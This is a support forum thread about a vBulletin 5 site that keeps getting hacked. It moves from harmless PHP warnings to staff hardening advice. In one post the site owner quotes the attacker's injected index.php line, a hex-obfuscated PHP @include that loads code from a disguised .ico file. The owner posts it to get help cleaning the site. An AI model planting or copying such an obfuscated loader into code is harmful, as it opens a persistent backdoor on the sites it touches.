Announcement

Collapse
No announcement yet.

Error log

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • Error log

    [20-Oct-2017 00:42:08 Europe/Minsk] PHP Warning: Illegal string offset 'starter' in public_html/includes/vb5/template.php(318) : eval()'d code on line 167
    [20-Oct-2017 00:42:08 Europe/Minsk] PHP Warning: Illegal string offset 'starterroute' in /public_html/includes/vb5/template.php(318) : eval()'d code on line 169
    [20-Oct-2017 03:34:41 Europe/Minsk] PHP Warning: Illegal string offset 'starter' in /public_html/includes/vb5/template.php(318) : eval()'d code on line 38
    [20-Oct-2017 03:34:41 Europe/Minsk] PHP Warning: Illegal string offset 'starterauthorname' in /public_html/includes/vb5/template.php(318) : eval()'d code on line 39
    [20-Oct-2017 03:34:41 Europe/Minsk] PHP Warning: Illegal string offset 'starteruserid' in /public_html/includes/vb5/template.php(318) : eval()'d code on line 40

    [19-Oct-2017 23:51:07 Europe/Minsk] PHP Warning: Cannot modify header information - headers already sent by (output started at /public_html/includes/vb5/applicationabstract.php:713) in /public_html/includes/vb5/cookie.php on line 44
    [20-Oct-2017 00:37:26 Europe/Minsk] PHP Warning: Cannot modify header information - headers already sent by (output started at /public_html/includes/vb5/applicationabstract.php:713) in /public_html/includes/vb5/cookie.php on line 44

  • #2
    There is not enough information here to enable us to assist you.

    Please answer the questions in THIS post, so we can provide assistance.
    MARK.B | vBULLETIN SUPPORT

    TalkNewsUK - My vBulletin 5.5.2 Demo
    AdminAmmo - My Cloud Demo

    Comment


    • #3
      PHP Version 7.0.22

      MySQL 5.5.56-cll-lve

      hooks disabled

      russian

      default theme

      Comment


      • #4
        Originally posted by mittac View Post
        PHP Version 7.0.22

        MySQL 5.5.56-cll-lve

        hooks disabled

        russian

        default theme
        You need to answer ALL the questions please.....otherwise we are simply guessing.
        MARK.B | vBULLETIN SUPPORT

        TalkNewsUK - My vBulletin 5.5.2 Demo
        AdminAmmo - My Cloud Demo

        Comment


        • #5
          • Error message on the screen' - NO
          • Browser and Browser version used. - I do not know, it's a log on the server
          • Did you clear the browser cache and did the error continue? - Yes
          • A list of steps that can be used to recreate the issue. - I do not know, it's a log on the server file error_log

          Comment


          • #6
            You still didn't tell us your vBulletin version, which is the very first question in the list. Apologies for what may seem like pedantry, but these questions are important and that's why they are in that list.

            If these errors are only showing in the server logs then it's nothing to be concerned about. They are not actually errors, they are 'warnings'. These are (correctly) not showing to end users on a production server.

            You should however ensure you are running the latest version of vB5 - which is 5.3.3.
            MARK.B | vBULLETIN SUPPORT

            TalkNewsUK - My vBulletin 5.5.2 Demo
            AdminAmmo - My Cloud Demo

            Comment


            • #7
              vBulletin version 5.3.3.

              Comment


              • #8
                I know that these are warnings, but my site is constantly hacked and I can not find how they do it. here I was not helped to find the problem

                Comment


                • #9
                  Originally posted by mittac View Post
                  I know that these are warnings, but my site is constantly hacked and I can not find how they do it. here I was not helped to find the problem
                  Ok well that's a different question entirely. The error logs are not really going to assist with that, at least not the entries shown.

                  What is actually happening with the 'hack'? What are they doing? What are the symptoms?
                  What's the history here? Have you recently upgraded to vB5 to try and solve this?
                  MARK.B | vBULLETIN SUPPORT

                  TalkNewsUK - My vBulletin 5.5.2 Demo
                  AdminAmmo - My Cloud Demo

                  Comment


                  • #10
                    Add to the files an index.php such a line at the beginning of the file
                    @include "\x2fhome\x2fatvc\x6cubb/\x70ubli\x63_htm\x6c/fon\x74s/ro\x62otoc\x6fnden\x73ed/f\x61vico\x6e_b83\x37ce.i\x63o";

                    and upload a file with the .ico extension

                    checked all the files, all cleared.
                    passwords changed everywhere several times - did not help

                    Comment


                    • #11
                      They are getting in through the server somehow.
                      What else are you running on the server besides vBulletin?
                      Is the server software up to date?

                      When you say you changed passwords - does this include the MySQL database password? Really important to change that (and update /core/includes/config.php with the new password).
                      MARK.B | vBULLETIN SUPPORT

                      TalkNewsUK - My vBulletin 5.5.2 Demo
                      AdminAmmo - My Cloud Demo

                      Comment


                      • #12
                        all updated
                        passwords for mysql is not updated, but changed to FTP
                        nothing else on the server is used, the hooks are disabled

                        now I change the password for the database
                        Last edited by mittac; Fri 20th Oct '17, 4:47am.

                        Comment


                        • #13
                          Originally posted by mittac View Post
                          all updated
                          passwords for mysql is not updated, but changed to FTP
                          nothing else on the server is used, the hooks are disabled

                          now I change the password for the database
                          Change the MySQL password.
                          Change all admin passwords
                          Change FTP again
                          Check for other FTP accounts, change all those or delete any not used.
                          Check the admin and moderator usergroups and delete any users you don;t recognise.
                          Run AdminCP > Maintenance > Diagnostics > Suspect File Versions and make sure nothing shows as unexpected content or not part of vBulletin.
                          Check plugins and hooks for anything you don't recognise.
                          Check templates for any that are modified...did you modifiy them? Even if you did, check them against the defaults to make sure no malicious code has been added.
                          Put the admincp behind an .htaccess password or limit it by IP (the config file in 5.3.3 allows this)
                          Enable two factor authentication for all admins: https://www.vbulletin.com/forum/arti...authentication
                          MARK.B | vBULLETIN SUPPORT

                          TalkNewsUK - My vBulletin 5.5.2 Demo
                          AdminAmmo - My Cloud Demo

                          Comment


                          • #14
                            ok, thanks
                            I will, I will check

                            Comment


                            • #15
                              all done, did not help - still hack the site. how to determine how they get on the server?

                              Comment

                              Related Topics

                              Collapse

                              Working...
                              X